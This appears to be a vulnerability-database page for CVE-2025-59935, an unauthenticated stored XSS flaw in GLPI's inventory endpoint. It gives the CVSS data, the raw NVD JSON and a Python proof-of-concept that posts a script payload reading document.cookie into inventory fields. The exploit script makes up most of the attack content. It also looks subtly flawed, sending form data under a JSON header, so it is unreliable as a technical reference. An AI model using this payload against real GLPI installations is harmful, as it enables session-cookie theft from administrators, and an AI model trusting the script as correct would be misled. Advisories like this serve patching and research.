Security Vulnerability Report
中文
CVE-2025-59935 CVSS 6.5 MEDIUM

CVE-2025-59935

Published: 2025-12-16 17:16:10
Last Modified: 2026-02-02 14:59:29
Source: [email protected]

Description

GLPI is a free asset and IT management software package. Starting in version 10.0.0 and prior to version 10.0.21, an unauthenticated user can store an XSS payload through the inventory endpoint. Users should upgrade to 10.0.21 to receive a patch.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* - VULNERABLE
GLPI 10.0.0 - 10.0.20

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-59935 PoC - GLPI Inventory Endpoint Stored XSS # Target: GLPI versions 10.0.0 to 10.0.20 # Author: Security Researcher TARGET_URL = "http://target-glpi-server" # Replace with actual target URL INVENTORY_ENDPOINT = f"{TARGET_URL}/front/inventory.php" # Malicious XSS payload xss_payload = '<script>alert(document.cookie)</script>' # Construct the inventory request with XSS payload inventory_data = { "itemtype": "Computer", "entities_id": 0, "name": f"TestComputer{xss_payload}", "serial": f"SN-{xss_payload}", "uuid": f"550e8400-e29b-41d4-a716-446655440000{xss_payload}" } def exploit(): """ Exploit stored XSS via GLPI inventory endpoint. The XSS payload will be stored and executed when other users view the inventory. """ print(f"[*] Target: {TARGET_URL}") print(f"[*] Exploiting CVE-2025-59935: Stored XSS in inventory endpoint") try: # Send inventory request with XSS payload response = requests.post( INVENTORY_ENDPOINT, data=inventory_data, headers={ "Content-Type": "application/json", "User-Agent": "GLPI-Inventory-Agent/1.0" }, timeout=30, verify=False ) print(f"[+] Request sent. Status code: {response.status_code}") if response.status_code == 200: print(f"[+] XSS payload may have been stored successfully") print(f"[*] Payload: {xss_payload}") print(f"[*] The XSS will execute when users access the inventory page") else: print(f"[-] Unexpected response: {response.text}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59935", "sourceIdentifier": "[email protected]", "published": "2025-12-16T17:16:10.137", "lastModified": "2026-02-02T14:59:28.943", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GLPI is a free asset and IT management software package. Starting in version 10.0.0 and prior to version 10.0.21, an unauthenticated user can store an XSS payload through the inventory endpoint. Users should upgrade to 10.0.21 to receive a patch."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.0.21", "matchCriteriaId": "71497A1A-8C87-48D5-9BA2-CFFF057BC3A7"}]}]}], "references": [{"url": "https://github.com/glpi-project/glpi/security/advisories/GHSA-j8vv-9f8m-r7jx", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.